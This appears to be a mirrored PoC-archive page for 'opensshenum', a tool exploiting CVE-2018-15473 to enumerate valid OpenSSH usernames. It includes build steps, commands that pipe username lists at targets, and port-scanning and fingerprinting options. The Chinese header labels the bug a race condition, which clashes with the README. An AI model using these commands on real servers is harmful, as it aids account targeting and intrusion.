关联漏洞
标题:
OpenSSH 竞争条件问题漏洞
(CVE-2018-15473)
描述:OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 7.7及之前版本中存在竞争条件问题漏洞。该漏洞源于网络系统或产品在运行过程中,并发代码需要互斥地访问共享资源时,对于并发访问的处理不当。
描述
CVE-2018-15473 - Opensshenum is an user enumerator exploiting an OpenSsh bug
介绍
Description:
============
Opensshenum is an OpenSsh user enumerator permitting to verify an arbitrary list of user names against an OpenSsh server, to know those actually presents on that remote machine. This program exploits a bug ( corrected in July 2018 ) proven to be effective at least starting from OpenSSH 2.3.0 ( released in November 2000).
I wrote the expoit starting from Tssh, a SSH 2 client I wrote in C++11 from scratch starting from the RFCs.
For more information read here:
http://seclists.org/oss-sec/2018/q3/124
This issue received CVE-2018-15473.
DISCLAIMER:
===========
This code has been posted for information and educational purposes. The intrusion in systems and services without the owner's authorisation is illegal. The misuse of the information and the software in this repo can result in criminal charges brought against the perpetrator of the crime. Any actions and or activities related to the material contained within this Git Repository is solely your responsibility. The author will not be held responsible in the event any criminal charges be brought against any individuals misusing the information or the software in this website to break the law.
Prerequisites:
==============
The program is intended to be used in a *nix environment and it is tested on various Linux distributions and OS X:
- Ubuntu 17.10;
- OS X 10.11.6;
using, as compiler, one in this list:
- gcc version7.2.0 (Ubuntu 7.2.0-8ubuntu3.2);
- Apple LLVM version 8.0.0 (clang-800.0.42.1)
and, as ssh server, one of the following:
- OpenSSH_7.5p1
The only external dependency is the OpenSSL library, used for the cryptographic functions.
I could introduce alternatives to OpenSSL in the next versions.
This program is intended to be used with an OpenSSL version equal or superior to:
- OpenSSL 1.0.2h;
( This means that with OS X, an upgrade is mandatory).
To compile the program, this tools/libraries are necessary:
- a c++ compiler ( with c++11 support);
- automake/autoconf;
- libtool;
- OpenSSL 1.0.2h or superior ("dev" packages);
Installation:
=============
- launch the configure script:
./configure
- Compile the program:
make
- Install the program and the man page:
sudo make install
Instructions:
=============
It elaborates the user list passed in pipe, example:
cat user.txt | ./opensshenum -i dummy_cert target_addr<BR>
xxx:NOK <BR>
gabriel:OK
where user.txt is a file containing a list of users, one for each line
and dummy_cert is a key generate with the commang ssh-keygen of OpenSsh
( the directory of the keys is ~/.shh as default).
A program could be used to geerate le list:
printf "xxx\ngabriel" | ./src/opensshenum -i dummy_rsa localhost <BR>
xxx:NOK <BR>
gabriel:OK
See the man page included in this release.
New Features:
=============
Port Scanner:
=============
Ssh port scanner capability added: now opensshenum can scan all the ports associated to an address to find out instances of SSH listening on ports different from 22 to perform the exploit only to those verified ports.
This feature can be used standalone, permitting to obtain only a list of the ports associated to SSh, without execute any attack.
Example:
opensshenum -s -n -t2 -m22221 -M22225 -r'.*OpenSSH' -idummy_rsa my_imaginary_website.com
will scan ports (-s) between 22221 and 22225 (both included) , performing only the scan (-n), with timeout of 2 secs (-t), expecting a hello string containing the string OpenSSH, using a public key named idummy_rsa (I recommend to generate a key only for this kind of operations) and using as target my_imaginary_website.com.
More information in the man page.
Parallel Execution:
===================
An alpha script using GNU Parallel ( parallenum.sh ) is included, as poc of the reduction of the scanning time reachable splitting the range of the ports to scan in sub-ranges, each of those of pertinence of a specific process. This obviously produce a lot of noise. To reduce the noise the -t param can be used at the purpose.
Fingerprinting:
===============
Fingerprint function, useful to identify automatically the OS type (i.e. if the "hello" string is omitted) and the services with a db of users/combitation of users. The db is create from *.lst files collected in a directory. Every *.lst file has name <os_name_or_service>.lst, examples:
ubuntu_17_10.lst
aix.lst
proprietary_ftp.lst
The db, a csv file, has format:
user_1;os_or_service_1; ... ;os_or_service_n
...
user_m;os_or_service_1; ... ;os_or_service_n
The db could be created from the *.lst files using the createdb utility, present in the directory ./utils, specifying the *.lst directory, example:
cd utils
make
./createdb ../lists/
To require the fingerprinting, use the -F option with the db file, example:
cat test/scan.sample | opensshenum -p22 -idummy_rsa -Futils/opensshenum.db localhost
文件快照
[4.0K] /data/pocs/e23a09cf909748c138096d01294fae623ce66fda
├── [ 43K] aclocal.m4
├── [ 100] AUTHORS
├── [7.2K] compile
├── [ 44K] config.guess
├── [ 35K] config.sub
├── [546K] configure
├── [2.4K] configure.ac
├── [ 18K] COPYING
├── [ 906] copyright
├── [ 23K] depcomp
├── [4.0K] doc
│ └── [3.7K] opensshenum.1
├── [4.0K] include
│ ├── [1.1K] anyexcept.hpp
│ ├── [1.9K] config.h.in
│ ├── [ 17K] Crypto.hpp
│ ├── [2.5K] Fingerprint.hpp
│ ├── [6.4K] Inet.hpp
│ ├── [1.1K] Main.hpp
│ ├── [ 18K] OpenSshEnum.hpp
│ ├── [1.6K] parseCmdLine.hpp
│ ├── [8.3K] StringUtils.hpp
│ └── [5.3K] Types.hpp
├── [ 15K] INSTALL
├── [ 14K] install-sh
├── [4.0K] lists
│ ├── [ 268] centos.lst
│ ├── [ 238] opensuse.lst
│ ├── [ 20] README
│ └── [ 223] ubuntu_17_10.lst
├── [277K] ltmain.sh
├── [4.0K] m4
│ ├── [280K] libtool.m4
│ ├── [6.0K] lt~obsolete.m4
│ ├── [ 12K] ltoptions.m4
│ ├── [4.3K] ltsugar.m4
│ └── [ 690] ltversion.m4
├── [ 154] Makefile.am
├── [ 25K] Makefile.in
├── [6.7K] missing
├── [ 99] NEWS
├── [ 503] README
├── [4.8K] README.md
├── [4.0K] src
│ ├── [ 29K] CryptoImpl.cpp
│ ├── [3.9K] Fingerprint.cpp
│ ├── [ 14K] InetImpl.cpp
│ ├── [ 10K] Main.cpp
│ ├── [ 507] Makefile.am
│ ├── [ 26K] Makefile.in
│ ├── [ 55K] OpenSshEnum.cpp
│ ├── [4.6K] parallenum.sh
│ ├── [3.0K] parseCmdLine.cpp
│ ├── [ 29K] StringUtilsImpl.cpp
│ └── [2.9K] TypesImpl.cpp
├── [4.0K] utils
│ ├── [2.3K] createdb.cpp
│ └── [ 123] makefile
└── [ 6] version
6 directories, 53 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。